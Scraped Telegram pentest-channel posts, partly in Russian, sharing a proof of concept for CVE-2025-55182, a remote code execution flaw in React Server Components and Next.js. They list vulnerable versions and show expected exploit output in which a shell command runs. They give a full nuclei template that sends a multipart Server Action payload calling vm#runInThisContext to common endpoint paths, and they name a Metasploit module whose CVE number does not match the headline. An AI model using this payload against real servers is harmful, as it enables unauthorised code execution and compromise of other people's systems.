GitHub
GitHub - ejpir/CVE-2025-55182-research: CVE-2025-55182 POC
CVE-2025-55182 POC. Contribute to ejpir/CVE-2025-55182-research development by creating an account on GitHub.
PoC к данной CVE
Уязвимые версии:
react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js: 15.x, 16.x (App Router)
Ожидаемый вывод:
=== CVE-2025-55182 - RCE via vm.runInThisContext ===
Test 1: Direct call to vm#runInThisContext with code
1+1 = {"success":true,"result":"2"}
Test 2: vm.runInThisContext with require
RCE attempt: {"success":true,"result":"uid=501(nick) gid=20(staff)..."}
Шаблон для nuclei:
id: CVE-2025-55182
info:
name: React Server Components RCE - CVE-2025-55182
author: sickwell
severity: critical
description: |
Remote Code Execution vulnerability in React Server Components via react-server-dom-webpack.
Missing hasOwnProperty check in requireModule allows prototype chain access to Node.js modules.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55182
- https://github.com/ejpir/CVE-2025-55182-poc
classification:
cve-id: CVE-2025-55182
cwe-id: CWE-20
tags: cve,cve2025,rce,react,server-components,nodejs
variables:
boundary: "----NucleiBoundary{{randstr}}"
math_code: "Math.PI * 2"
expected_result: "6.283185307179586"
http:
- method: POST
path:
- "{{BaseURL}}/formaction"
- "{{BaseURL}}/api/formaction"
- "{{BaseURL}}/api/v1/login"
- "{{BaseURL}}/actions"
- "{{BaseURL}}/server-actions"
headers:
Content-Type: "multipart/form-data; boundary={{boundary}}"
User-Agent: "Nuclei - CVE-2025-55182"
body: |
--{{boundary}}
Content-Disposition: form-data; name="$ACTION_REF_0"
--{{boundary}}
Content-Disposition: form-data; name="$ACTION_0:0"
{"id":"vm#runInThisContext","bound":["{{math_code}}"]}
--{{boundary}}--
extractors:
- type: regex
name: vulnerable_path
part: url
regex:
- '(/(?:formaction|api/formaction|api/v1/login|actions|server-actions))'
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "success")'
- 'contains(body, "result")'
- 'contains(body, "{{expected_result}}")'
condition: and
matchers-condition: and
#cve #poc #react #webpentest #rce
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍2
CVE-2025-55182 is a critical Remote Code Execution (RCE) vulnerability in React Server Components (RSC) affecting Next.js applications using App Router with Server Actions
The vulnerability exists in the Flight protocol deserialization process, allowing attackers to achieve arbitrary code execution through prototype pollution
Msf:
use multi/http/react2shell_cve_2025_55102
BurpSuite ActiveScan++ детектит React2Shell
#cve #poc #nextjs #react
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3👍2